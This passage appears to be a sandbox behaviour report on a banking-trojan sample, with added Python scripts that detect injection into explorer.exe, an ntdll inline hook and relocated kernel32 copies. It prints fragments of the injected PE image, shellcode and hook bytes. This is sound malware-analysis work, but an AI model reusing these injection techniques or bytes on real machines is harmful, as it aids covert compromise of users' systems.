\KnownDlls\wininet.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1
\KnownDlls\Normaliz.dll write and read and execute unknown 330000 36864 own pid read write conflicting addresses 1
\KnownDlls\winmm.dll write and read and execute unknown 330000 36864 own pid read write object name not found 1
C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 340000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 340000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 370000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 950000 618496 own pid readonly success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 950000 8462336 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 950000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 3B0000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 3B0000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 3B0000 4096 own pid readonly success or wait 1
\BaseNamedObjects\DBWIN_BUFFER write unknown C70000 1007616 own pid readonly object name not found 1
none query and write and read commit BD0000 16384 own pid read write success or wait 1
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
C:\WINDOWS\system32\kernel32.dll query and write and read and execute and extend size image C20000 1007616 own pid readonly image not at base 1 403AA1
C:\WINDOWS\system32\kernel32.dll query and write and read and execute and extend size image C20000 1007616 own pid readonly image not at base 1 403AA1
C:\WINDOWS\system32\kernel32.dll query and write and read and execute and extend size image C20000 1007616 own pid readonly image not at base 1 403AA1
\KnownDlls\WS2_32.dll write and read and execute unknown C20000 1007616 own pid readonly object name not found 1 402365
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1 402365
\KnownDlls\WS2HELP.dll write and read and execute unknown 71AB0000 94208 own pid read write object name not found 1 402365
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1 402365
C:\WINDOWS\system32\kernel32.dll query and write and read and execute and extend size image C70000 1007616 own pid readonly image not at base 1 C31D35
C:\WINDOWS\system32\kernel32.dll query and write and read and execute and extend size image C70000 1007616 own pid readonly image not at base 1 C31D35
C:\WINDOWS\system32\ntdll.dll query and read commit BD0000 65536 own pid readonly success or wait 1 C26A8A
Registry Activities:
+ Key value queried
Key Path Name Completion Count Source Address
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName ComputerName success or wait 1 BD0897
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\Global\System64 success or wait 1 40347C
Process Activities:
+ Process terminated
PID Filepath Completion Count Source Address
2444 C:\Recycle.Bin\B6232F3AC2C.exe success or wait 1 404F44
2444 C:\Recycle.Bin\B6232F3AC2C.exe success or wait 0 404F44
Memory Activities:
+ Memory written
PID Filepath Base Length Value Completion Count Source Address
1636 C:\WINDOWS\explorer.exe BAD0000 286720 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 15 19 02 00 00 10 00 success or wait 1 C2764B
1636 C:\WINDOWS\explorer.exe BADAFFC 13 B8 00 00 EB 0A 50 BA 50 16 AF 0B FF D2 success or wait 1 C418F5
1636 C:\WINDOWS\explorer.exe 19E0000 4096 64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C 8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 C7 02 6C 00 6C 00 83 C2 04 83 22 00 8D 45 FC 89 45 EC 8D 45 AC 6A 18 89 45 E8 58 66 89 45 E4 6A 1A 58 66 89 45 E6 8D 45 E4 89 45 F4 8B 45 EC 50 8B 45 F4 50 83 E0 00 50 50 FF 55 F0 89 45 F8 8B 45 FC C9 C3 55 8B EC 51 51 53 8B 5D 08 8B 43 3C 8B 4C 18 78 8B 45 0C C1 E8 10 03 CB 66 85 C0 75 15 0F B7 45 0C 2B 41 10 8B 49 1C 8D 04 81 8B 04 18 03 C3 5B C9 C3 83 65 FC 00 56 8B 71 20 57 8B 79 24 03 F3 03 FB 83 79 18 00 76 3F 8B 06 83 65 F8 00 03 C3 8A success or wait 1 C37FF4
1636 C:\WINDOWS\explorer.exe 7C90CFEE 5 E9 BF 33 0D 85 success or wait 1 C32A6F
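The four rows above are the whole injection in miniature: a PE image (MZ header, e_lfanew 0xD0) dropped at BAD0000 in explorer.exe, a 13-byte stub at BADAFFC, 4096 bytes of position-independent code at 19E0000 that begins with `mov eax, fs:[0x18]` and `mov eax, fs:[0x30]` (TEB and PEB reads) and assembles "kernel32.dll" on the stack two characters at a time, and a 5-byte write at 7C90CFEE, which lies inside ntdll.dll (ImageBase 7C900000, SizeOfImage 0xB2000 in the ntdll optional header bytes read back under File read above). The script below is an added example, not part of the Joebox report and not SpyEye's code: it parses the dumped PE header, decodes the 5-byte write as an `E9 rel32` jump and checks whether its target lands in a region written into the same PID, and recovers the wide string the shellcode builds on the stack. The byte strings are copied from the rows above (the PE dump's zero padding is regenerated, the shellcode is cut to its leading bytes); the `Write` record and the function names are this example's own.

```python
import struct
from collections import namedtuple
from datetime import datetime, timezone

# One "Memory written" row: target PID, base, the report's Length column and the dumped
# bytes. The dump may be an excerpt, so Length is carried separately from len(data).
Write = namedtuple("Write", "pid base length data")

# Bytes copied from the rows above (PID 1636, explorer.exe). The PE image is rebuilt from
# its first 32 bytes, e_lfanew (0xD0) and the PE header bytes shown; the zero padding
# between them is regenerated here, not copied from the report.
MZ_HEAD = bytes.fromhex("4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 "
                        "B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00")
PE_HEAD = bytes.fromhex("50 45 00 00 4C 01 02 00 9D 80 86 4E 00 00 00 00 00 00 00 00 "
                        "E0 00 02 01 0B 01 0A 00 00 26 04 00 00 1E 00 00 00 00 00 00 "
                        "15 19 02 00 00 10 00")
IMAGE = MZ_HEAD + b"\0" * 28 + bytes.fromhex("D0 00 00 00") + b"\0" * (0xD0 - 64) + PE_HEAD
STUB = bytes.fromhex("B8 00 00 EB 0A 50 BA 50 16 AF 0B FF D2")
SHELLCODE = bytes.fromhex(  # leading bytes of the 4096-byte dump written at 19E0000
    "64 A1 18 00 00 00 C3 55 8B EC 83 EC 54 83 65 FC 00 64 A1 30 00 00 00 8B 40 0C "
    "8B 40 1C 8B 40 08 68 34 05 74 78 50 E8 83 00 00 00 59 59 89 45 F0 85 C0 74 75 "
    "8D 45 AC 89 45 F4 8B 55 F4 C7 02 6B 00 65 00 83 C2 04 C7 02 72 00 6E 00 83 C2 04 "
    "C7 02 65 00 6C 00 83 C2 04 C7 02 33 00 32 00 83 C2 04 C7 02 2E 00 64 00 83 C2 04 "
    "C7 02 6C 00 6C 00 83 C2 04 83 22 00")
HOOK = bytes.fromhex("E9 BF 33 0D 85")

WRITES = [
    Write(1636, 0x0BAD0000, 286720, IMAGE),
    Write(1636, 0x0BADAFFC, 13, STUB),
    Write(1636, 0x019E0000, 4096, SHELLCODE),
    Write(1636, 0x7C90CFEE, 5, HOOK),
]

def parse_pe_header(data):
    """COFF and optional-header fields an analyst checks first, or None if not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    pe_off, = struct.unpack_from("<I", data, 0x3C)
    if pe_off + 44 > len(data) or data[pe_off:pe_off + 4] != b"PE\0\0":
        return None
    machine, nsec, ts, _sym, _nsym, _optsize, chars = struct.unpack_from("<HHIIIHH", data, pe_off + 4)
    magic, = struct.unpack_from("<H", data, pe_off + 24)   # optional header Magic
    entry, = struct.unpack_from("<I", data, pe_off + 40)   # AddressOfEntryPoint (RVA)
    return {"machine": machine, "sections": nsec, "timestamp": ts,
            "build_time": datetime.fromtimestamp(ts, timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ"),
            "characteristics": chars, "pe32": magic == 0x10B, "entry_rva": entry}

def jmp_rel32_target(addr, data):
    """Absolute target of a 5-byte `E9 rel32` written at addr (32-bit wrap), else None."""
    if len(data) != 5 or data[0] != 0xE9:
        return None
    rel = int.from_bytes(data[1:5], "little", signed=True)
    return (addr + 5 + rel) & 0xFFFFFFFF

def region_containing(addr, pid, writes):
    """Base of the written region in pid that contains addr, judged by the report's Length."""
    for w in writes:
        if w.pid == pid and w.base <= addr < w.base + w.length:
            return w.base
    return None

def stack_string(data):
    """Recover UTF-16LE text stored by runs of `mov dword [edx], imm32` (C7 02 imm32).
    A byte-pattern heuristic, not a disassembler: exact for this stub, noisy elsewhere."""
    out, i = [], 0
    while i + 6 <= len(data):
        if data[i:i + 2] == b"\xC7\x02":
            out.append(data[i + 2:i + 6].decode("utf-16-le"))
            i += 6
        else:
            i += 1
    return "".join(out)

def analyse(writes):
    """Classify each foreign-process write: dropped PE, PEB-walking shellcode or jmp hook."""
    findings = []
    for w in writes:
        pe = parse_pe_header(w.data)
        if pe:
            findings.append(("pe_image", w.pid, w.base, w.base + pe["entry_rva"], pe["build_time"]))
        target = jmp_rel32_target(w.base, w.data)
        if target is not None:
            findings.append(("jmp_hook", w.pid, w.base, target, region_containing(target, w.pid, writes)))
        if b"\x64\xA1\x30\x00\x00\x00" in w.data:  # mov eax, fs:[0x30]: reads the PEB
            findings.append(("peb_walk", w.pid, w.base, stack_string(w.data)))
    return findings

if __name__ == "__main__":
    for f in analyse(WRITES):
        print(f[0], f[1], *(hex(x) if isinstance(x, int) else x for x in f[2:]))
```

The jump at 7C90CFEE resolves to 19E03B2, 0x3B2 into the 4096-byte region, so the 5-byte write is an inline hook on ntdll that diverts into the injected code; the dropped image's entry point lands at BAF1915, inside the 286720 bytes written at BAD0000. Treat the TimeDateStamp as the linker's claim rather than evidence, since it is trivially forged.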
+ Memory allocated
PID Filepath Base Length Protection Completion Count Source Address
2444 C:\Recycle.Bin\B6232F3AC2C.exe 3E0000 12FFA0 page execute and read and write success or wait 1 40FA57
2444 C:\Recycle.Bin\B6232F3AC2C.exe BD0000 12F610 page execute and read and write success or wait 1 3E1A32
2444 C:\Recycle.Bin\B6232F3AC2C.exe BF0000 12F610 page execute and read and write success or wait 1 3E2B0E
2444 C:\Recycle.Bin\B6232F3AC2C.exe C20000 12FBF4 page execute and read and write success or wait 1 404F1D
1636 C:\WINDOWS\explorer.exe BAD0000 12F5A8 page execute and read and write success or wait 1 C35848
1636 C:\WINDOWS\explorer.exe 19E0000 12F5D8 page execute and read and write success or wait 1 C37FF4
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
2444 C:\Recycle.Bin\B6232F3AC2C.exe 400000 1000 page read and write page readonly success or wait 1 4611FF
2444 C:\Recycle.Bin\B6232F3AC2C.exe 400000 1000 page readonly page read and write success or wait 1 461214
2444 C:\Recycle.Bin\B6232F3AC2C.exe 400000 63000 page execute and read and write page readonly success or wait 1 3E0852
2444 C:\Recycle.Bin\B6232F3AC2C.exe 401000 3E000 page execute and read and write page execute and read and write success or wait 1 3E20AA
2444 C:\Recycle.Bin\B6232F3AC2C.exe 43F000 18000 page execute and read and write page execute and read and write success or wait 1 3E20AA
2444 C:\Recycle.Bin\B6232F3AC2C.exe 457000 1000 page read and write page execute and read and write success or wait 1 3E20AA
2444 C:\Recycle.Bin\B6232F3AC2C.exe 400000 1000 page read and write page execute and read and write success or wait 1 456796
2444 C:\Recycle.Bin\B6232F3AC2C.exe 400000 1000 page execute and read and write page read and write success or wait 1 4567AB
2444 C:\Recycle.Bin\B6232F3AC2C.exe C55FA8 1000 page execute and read and write page execute read success or wait 3 40375F
2444 C:\Recycle.Bin\B6232F3AC2C.exe 44E15C 1000 page execute and read and write page execute and read and write success or wait 1 404A59
2444 C:\Recycle.Bin\B6232F3AC2C.exe 451D90 2000 page execute and read and write page execute and read and write success or wait 1 404AB9
2444 C:\Recycle.Bin\B6232F3AC2C.exe CA5FA8 1000 page execute and read and write page execute read success or wait 2 C28790
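The kernel32.dll rows under "Section loaded by program" that complete with "image not at base" are the behaviour behind the "Relocates Windows system DLLs" signature in the overview: NtMapViewOfSection returns STATUS_IMAGE_NOT_AT_BASE when an image section cannot be mapped at its preferred base, and here that base (7C800000) is already occupied by the copy the loader mapped from \KnownDlls\kernel32.dll, so the sample obtains a second, private copy of kernel32 at C20000 and later at C70000. The protection changes at C55FA8 and CA5FA8 in the table above then fall inside those copies. The script below is an added example, not part of the Joebox report: it parses rows in the chronological format used further down, lists system DLLs mapped as relocated image copies, and reports writable-and-executable protection changes that land inside the most recently mapped copy. The sample rows are copied from this report, with the second protection column labelled Old Protection as in the "Memory attributes changed" table (the parser accepts either label); the function names are this example's own.

```python
import re

# Completion values seen in this report's chronological rows; anchoring on them keeps the
# free-text protection fields from swallowing the status.
COMPLETION = (r"(?P<completion>success or wait|image not at base|object name not found"
              r"|object name collision|conflicting addresses)")
SECTION_RE = re.compile(
    r"^Section loaded Path: (?P<path>\S+) Access: (?P<access>[a-z ]+?) Type: (?P<type>\w+) "
    r"Baseaddress: (?P<base>[0-9A-Fa-f]+) Size: (?P<size>\d+) Protection: (?P<prot>[a-z ]+?) "
    r"Mapped to pid: (?P<pid>own pid|\d+) " + COMPLETION + r" (?P<time>\d+)$")
MEM_RE = re.compile(
    r"^Memory attributes changed PID: (?P<pid>\d+) Path: (?P<path>\S+) Base: (?P<base>[0-9A-Fa-f]+) "
    r"Length: (?P<length>[0-9A-Fa-f]+) New Protection: (?P<new>page [a-z ]+?) "
    r"(?:Old|New) Protection: (?P<old>page [a-z ]+?) " + COMPLETION + r" (?P<time>\d+)$")

# Rows copied from this report's chronological section (PID 2444). The wininet row, the
# "File opened" row and the RWX change inside the sample's own image show what is ignored.
SAMPLE = [
    r"Section loaded Path: \KnownDlls\wininet.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 2003511024",
    r"Memory attributes changed PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: 400000 Length: 63000 New Protection: page execute and read and write Old Protection: page readonly success or wait 2003973383",
    r"File opened Path: C:\WINDOWS\system32\kernel32.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2007411520",
    r"Section loaded Path: C:\WINDOWS\system32\kernel32.dll Access: query and write and read and execute and extend size Type: image Baseaddress: C20000 Size: 1007616 Protection: readonly Mapped to pid: own pid image not at base 2007413906",
    r"Memory attributes changed PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: C55FA8 Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2007414736",
    r"Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 2007439769",
    r"Section loaded Path: C:\WINDOWS\system32\kernel32.dll Access: query and write and read and execute and extend size Type: image Baseaddress: C70000 Size: 1007616 Protection: readonly Mapped to pid: own pid image not at base 2007445375",
    r"Memory attributes changed PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: CA5FA8 Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2007445712",
]

def parse(lines):
    """Yield (kind, fields) for rows the two patterns understand; other rows are skipped."""
    for line in lines:
        m = SECTION_RE.match(line)
        if m:
            yield "section", m.groupdict()
            continue
        m = MEM_RE.match(line)
        if m:
            yield "memprot", m.groupdict()

def relocated_system_dlls(lines):
    """System DLLs mapped as a private image copy away from the preferred base, i.e. an
    image-type section that completed with 'image not at base'. Returns (path, base, size, time)."""
    out = []
    for kind, f in parse(lines):
        if (kind == "section" and f["type"] == "image" and f["completion"] == "image not at base"
                and f["path"].lower().startswith("c:\\windows\\system32\\")):
            out.append((f["path"], int(f["base"], 16), int(f["size"]), int(f["time"])))
    return out

def patches_in_relocated_copies(lines, relocs):
    """Writable-and-executable protection changes whose address lies inside the most recently
    mapped relocated copy that precedes the change. Returns (path, copy_base, offset, time)."""
    hits = []
    for kind, f in parse(lines):
        if kind != "memprot" or "execute" not in f["new"] or "write" not in f["new"]:
            continue
        addr, t = int(f["base"], 16), int(f["time"])
        containing = [r for r in relocs if r[1] <= addr < r[1] + r[2] and r[3] <= t]
        if containing:
            path, rbase, _, _ = max(containing, key=lambda r: r[3])
            hits.append((path, rbase, addr - rbase, t))
    return hits

if __name__ == "__main__":
    relocs = relocated_system_dlls(SAMPLE)
    for path, base, size, t in relocs:
        print(f"relocated copy of {path} at {base:#x} ({size} bytes), t={t}")
    for path, base, off, t in patches_in_relocated_copies(SAMPLE, relocs):
        print(f"RWX change at {path}+{off:#x} inside the copy at {base:#x}, t={t}")
```

Both hits come out at offset 0x35FA8 from the respective copy's base: the same location is patched in each fresh copy of kernel32, which is the offset a practitioner would resolve against the kernel32.dll build on the analysis image to name the function being prepared. The containment test relies on the Size column of the section row, so a truncated or absent size silently hides a hit.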
System Activities:
+ System information queried
System info class Completion Count Source Address
ProcessInformation success or wait 1 C37E10
Token Activities:
+ Token privilege adjusted
Status Privilege Completion Count Source Address
on Debug success or wait 2 BD0154
+ Chronological sections
Operation Data Completion Time
Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2003376826
Section loaded Path: none Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2003380644
Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 260000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 2003384280
Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 280000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2003385717
Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 2D0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2003386847
Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 2003387593
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2003389045
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 320000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2003389413
Section loaded Path: \KnownDlls\advapi32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 2003391603
Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 2003394675
Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 2003398575
Section loaded Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid success or wait 2003404614
Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 2003406624
Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 2003409853
Section loaded Path: \KnownDlls\comdlg32.dll Access: write and read and execute Type: unknown Baseaddress: 763B0000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 2003418579
Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 2003423391
Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 2003427258
Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 2003445644
Section loaded Path: \KnownDlls\crypt32.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid object name not found 2003455394
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and write and read and execute Type: image Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 2003457302
Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid object name not found 2003461155
Section loaded Path: C:\WINDOWS\system32\msasn1.dll Access: query and write and read and execute Type: image Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2003462739
Section loaded Path: \KnownDlls\msimg32.dll Access: write and read and execute Type: unknown Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid object name not found 2003469816
Section loaded Path: C:\WINDOWS\system32\msimg32.dll Access: query and write and read and execute Type: image Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 2003471425
Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 2003475405
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 2003485718
Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 2003489274
Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 2003499798
Section loaded Path: \KnownDlls\version.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2003507721
Section loaded Path: \KnownDlls\wininet.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 2003511024
Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: 330000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 2003517274
Section loaded Path: \KnownDlls\winmm.dll Access: write and read and execute Type: unknown Baseaddress: 330000 Size: 36864 Protection: read write Mapped to pid: own pid object name not found 2003525904
Section loaded Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid success or wait 2003527449
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 340000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2003544635
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 340000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2003547206
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 2003549324
Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 370000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2003562360
Section loaded Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 950000 Size: 618496 Protection: readonly Mapped to pid: own pid success or wait 2003565793
Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 950000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 2003584532
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 950000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 2003627394
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 2003630049
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 3B0000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 2003639538
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 3B0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2003642467
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 3B0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2003644734
Memory attributes changed PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: 400000 Length: 1000 New Protection: page read and write Old Protection: page readonly success or wait 2003895823
Memory attributes changed PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: 400000 Length: 1000 New Protection: page readonly Old Protection: page read and write success or wait 2003896173
Memory allocated PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: 3E0000 Length: 12FFA0 Allocation Type: null Protection: page execute and read and write success or wait 2003955589
Memory attributes changed PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: 400000 Length: 63000 New Protection: page execute and read and write Old Protection: page readonly success or wait 2003973383
Memory allocated PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: BD0000 Length: 12F610 Allocation Type: null Protection: page execute and read and write success or wait 2003974880
Memory allocated PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: BF0000 Length: 12F610 Allocation Type: null Protection: page execute and read and write success or wait 2003975419
Memory attributes changed PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: 401000 Length: 3E000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2007379482
Memory attributes changed PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: 43F000 Length: 18000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2007379990
Memory attributes changed PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: 457000 Length: 1000 New Protection: page read and write Old Protection: page execute and read and write success or wait 2007380287
Memory attributes changed PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: 400000 Length: 1000 New Protection: page read and write Old Protection: page execute and read and write success or wait 2007409618
Memory attributes changed PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: 400000 Length: 1000 New Protection: page execute and read and write Old Protection: page read and write success or wait 2007410501
File opened Path: C:\WINDOWS\system32\kernel32.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2007411520
Section loaded Path: C:\WINDOWS\system32\kernel32.dll Access: query and write and read and execute and extend size Type: image Baseaddress: C20000 Size: 1007616 Protection: readonly Mapped to pid: own pid image not at base 2007413906
Memory attributes changed PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: C55FA8 Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2007414736
Memory attributes changed PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: 44E15C Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2007417353
File opened Path: C:\WINDOWS\system32\kernel32.dll Access: synchronize and generic read Options: synchronous io non alert and non directory file and random access success or wait 2007417644
Section loaded Path: C:\WINDOWS\system32\kernel32.dll Access: query and write and read and execute and extend size Type: image Baseaddress: C20000 Size: 1007616 Protection: readonly Mapped to pid: own pid image not at base 2007418020
Memory attributes changed PID: 2444 Path: C:\Recycle.Bin\B6232F3AC2C.exe Base: C55FA8 Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2007419163
